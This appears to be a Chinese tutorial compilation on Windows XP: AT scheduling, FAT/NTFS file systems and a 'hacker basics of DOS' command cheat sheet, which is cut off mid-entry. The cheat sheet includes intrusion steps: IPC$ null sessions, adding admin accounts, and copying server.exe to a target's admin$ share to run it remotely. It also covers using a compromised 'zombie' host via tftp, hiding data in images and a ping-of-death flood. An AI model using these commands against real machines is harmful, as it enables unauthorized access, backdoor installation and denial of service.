1、体验WindowsXP系统内置的AT命令2、磁盘格式的问题3、黑客基础之DOS4、如何防止恶意网页篡改注册表5、如何进入BIOS设置?6、端口分类体验WindowsXP系统内置的AT命令AT命令是WindowsXP中内置的命令,它也可以媲美Windows中的“计划任务”,而且在计划的安排、任务的管理、工作事务的处理方面,AT命令具有更强大更神通的功能。AT命令可在指定时间和日期、在指定计算机上运行命令和程序。我们可以在“开始→运行”中输入AT命令,下面就来看看AT命令的一些实例分析。定时关机定时提醒自动运行批处理文件取消已经安排的计划1、定时关机命令:at21:00ShutDown–S–T30该命令运行后,到了21:00点,电脑会出现“系统关机”对话框,并默认30秒延时自动关机。2、定时提醒命令:at12:00NetSend10.10.36.122与朋友约会的时间到了,快点准备出发吧!其中NetSend是Windows内部程序,可以发送消息到网络上的其他用户、计算机。10.10.36.122是本机电脑的IP地址。这个功能在Windows中也称作“信使服务”。3、自动运行批处理文件如果公司的数据佷重要,要求在指定的日期/时间进行备份,那么运行:命令:at1:00AM/Every:SaturdayMy_BackUp.bat这样,在每个Saturday(周六)的早上1:00点,电脑定时启动My_BackUp.bat批处理文件。My_BackUp.bat是一个你自行编制的批处理文件,它包含能对系统进行数据完全备份的多条命令。4、取消已经安排的计划命令:at5/Delete有时候,你已经安排好的计划可能临时变动,这样你可以及时地用上述命令删除该计划(5为指派给已计划命令的标识编号),当然,删除该计划后,可以重新安排。磁盘格式的问题1、什么是NTFS?想要了解NTFS,我们首先应该认识一下FAT。FAT(FileAllocationTable)是“文件分配表”的意思。对我们来说,它的意义在于对硬盘分区的管理。FAT16、FAT32、NTFS是目前最常见的三种文件系统。FAT16:我们以前用的DOS、Windows95都使用FAT16文件系统,现在常用的Windows98/2000/XP等系统均支持FAT16文件系统。它最大可以管理大到2GB的分区,但每个分区最多只能有65525个簇(簇是磁盘空间的配置单位)。随着硬盘或分区容量的增大,每个簇所占的空间将越来越大,从而导致硬盘空间的浪费。FAT32:随着大容量硬盘的出现,从Windows98开始,FAT32开始流行。它是FAT16的增强版本,可以支持大到2TB(2048GB)的分区。FAT32使用的簇比FAT16小,从而有效地节约了硬盘空间。NTFS:微软WindowsNT内核的系列操作系统支持的、一个特别为网络和磁盘配额、文件加密等管理安全特性设计的磁盘格式。随着以NT为内核的Windows2000/XP的普及,及winvista/win7的广泛应用,很多个人用户开始用到了NTFS。NTFS也是以簇为单位来存储数据文件,但NTFS中簇的大小并不依赖于磁盘或分区的大小。簇尺寸的缩小不但降低了磁盘空间的浪费,还减少了产生磁盘碎片的可能。NTFS支持文件加密管理功能,可为用户提供更高层次的安全保证。2、什么系统可以支持NTFS文件系统?只有WindowsNT/2000/XP/vista/win7才能识别NTFS系统,Windows9x/Me以及DOS等操作系统都不能支持、识别NTFS格式的磁盘。由于DOS系统不支持NTFS系统,所以最好不要将C:盘制作为NTFS系统,这样在系统崩溃后便于在DOS系统下修复。NTFS与操作系统支持情况表文件系统支持的操作系统FAT16windows95/98/Me/NT/2000/XPUnix,Linux,DOSFAT32windows95/98/Me/2000/XPNTFSwindowsnt/2000/XP/vista/win7黑客基础之DOSnetuse\\ip\ipc$/user:建立IPC空链接netuse\\ip\ipc$密码/user:用户名建立IPC非空链接netuseh:\\ip\c$密码/user:用户名直接登陆后映射对方C:到本地为H:netuseh:\\ip\c$登陆后映射对方C:到本地为H:netuse\\ip\ipc$/del删除IPC链接netuseh:/del删除映射对方到本地的为H:的映射netuser用户名密码/add建立用户netuserguest/active:yes激活guest用户黑客基础之DOSnetuser查看有哪些用户netuser帐户名查看帐户的属性netlocalgroupadministrators用户名/add把“用户”添加到管理员中使其具有管理员权限,注意:administrator后加s用复数netstart查看开启了哪些服务netstart服务名开启服务;(如:netstarttelnet,netstartschedule)netstop服务名停止某服务nettime\\目标ip查看对方时间nettime\\目标ip/set设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息netview查看本地局域网内开启了哪些共享netview\\ip查看对方局域网内开启了哪些共享netconfig显示系统网络设置netlogoff断开连接的共享netpause服务名暂停某服务netsendip文本信息向对方发信息netver局域网内正在使用的网络连接类型和信息netshare查看本地开启的共享netshareipc$开启ipc$共享netshareipc$/del删除ipc$共享netsharec$/del删除C:共享netuserguest12345用guest用户登陆后用将密码改为12345netpassword密码更改系统登陆密码netstat-a查看开启了哪些端口,常用netstat-annetstat-n查看端口的网络连接情况,常用netstat-annetstat-v查看正在进行的工作netstat-p协议名例:netstat-ptcq/ip查看某协议使用情况(查看tcp/ip协议使用情况)netstat-s查看正在使用的所有协议使用情况nbtstat-Aip对方136到139其中一个端口开了的话,就可查看对方最近登陆的用户名(03前的为用户名)-注意:参数-A要大写tracert-参数ip(或计算机名)跟踪路由(数据包),参数:“-w数字”用于设置超时间隔。pingip(或域名)向对方主机发送默认大小为32字节的数据,参数:“-l[空格]数据包大小”;“-n发送数据次数”;“-t”指一直ping。ping-t-l65550ip死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping)ipconfig(winipcfg)用于windowsNT及XP(windows9598)查看本地ip地址,ipconfig可用参数“/all”显示全部配置信息tlist-t以树行列表显示进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内)kill-F进程名加-F参数后强制结束某进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内)del-F文件名加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件,/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文件。例如“DEL/AR*.*”表示删除当前目录下所有只读文件,“DEL/A-S*.*”表示删除当前目录下除系统文件以外的所有文件del/S/Q目录或用:rmdir/s/Q目录/S删除目录及目录下的所有子目录和文件。同时使用参数/Q可取消删除操作时的系统确认就直接删除。(二个命令作用相同)move盘符\路径\要移动的文件名存放移动文件的路径\移动后文件名移动文件,用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖fcone.txttwo.txt3st.txt对比二个文件并把不同之处输出到3st.txt文件中,和是重定向命令atid号开启已注册的某个计划任务at/delete停止所有计划任务,用参数/yes则不需要确认就直接停止atid号/delete停止某个已注册的计划任务at查看所有的计划任务at\\iptime程序名(或一个命令)/r在某时间运行对方某程序并重新启动计算机fingerusername@host查看最近有哪些用户登陆telnetip端口远和登陆服务器,默认端口为23openip连接到IP(属telnet登陆后的命令)telnet在本机上直接键入telnet将进入本机的telnetcopy路径\文件名1路径\文件名2/y复制文件1到指定的目录为文件2,用参数/y就同时取消确认你要改写一份现存目录文件copyc:\srv.exe\\ip\admin$复制本地c:\srv.exe到对方的admin下cppy1st.jpg/b+2st.txt/a3st.jpg将2st.txt的内容藏身到1st.jpg中生成3st.jpg新的文件,注:2st.txt文件头要空三排,参数:/b指二进制文件,/a指ASCLL格式文件copy\\ip\admin$\svv.exec:\或:copy\\ip\admin$\*.*复制对方admini$共享下的srv.exe文件(所有文件)至本地C:xcopy要复制的文件或目录树目标地址\目录名复制文件和目录树,用参数/Y将不提示覆盖相同文件tftp-i自己IP(用肉机作跳板时这用肉机IP)getserver.exec:\server.exe登陆后,将“IP”的server.exe下载到目标主机c:\server.exe参数:-i指以二进制模式传送,如传送exe文件时用,如不加-i则以ASCII模式(传送文本文件模式)进行传送tftp-i对方IPputc:\server.exe登陆后,上传本地c:\server.exe至主机ftpip端口用于上传文件至服务器或进行文件操作,默认端口为21。bin指用二进制方式传送(可执行文件进);默认为ASCII格式传送(文本文件时)routeprint显示出IP路由,将主要显示网络地址Networkaddres,子网掩码Netmask,网关地址Gatewayaddres,接口地址Interfacearp查看和处理ARP缓存,ARP是名字解析的意思,负责把一个IP解析成一个物理性的MAC地址。arp-a将显示出全部信息start程序名或命令/max或/min新开一个新窗口并最大化(最小化)运行某程序或命令mem查看cpu使用情况attrib文件名(目录名)查看某文件(目录)的属性attrib文件名-A-R-S-H或+A+R+S+H去掉(添加)某文件的存档,只读,系统,隐藏属性;用+则是添加为某属性dir查看文件,参数:/Q显示文件及目录属系统哪个用户,/T:C显示文件创建时间,/T:A显示文件上次被访问时间,/T:W上次被修改时间date/t、time/t使用此参数即“DATE/T”、“TIME/T”将只显示当前日期和时间,而不必输入新日期和时间set指定环境变量名称=要指派给变量的字符设置环境变量set显示当前所有的环境变量setp(或其它字符)显示出当前以字符p(或其它字符)开头的所有环境变量pause暂停批处理程序,并显示出:请按任意键继续....if在批处理程序中执行条件处理(更多说明见if命令及变量)goto标签将cmd.exe导向到批处理程序中带标签的行(标签必须单独一行,且以冒号打头,例如:“:start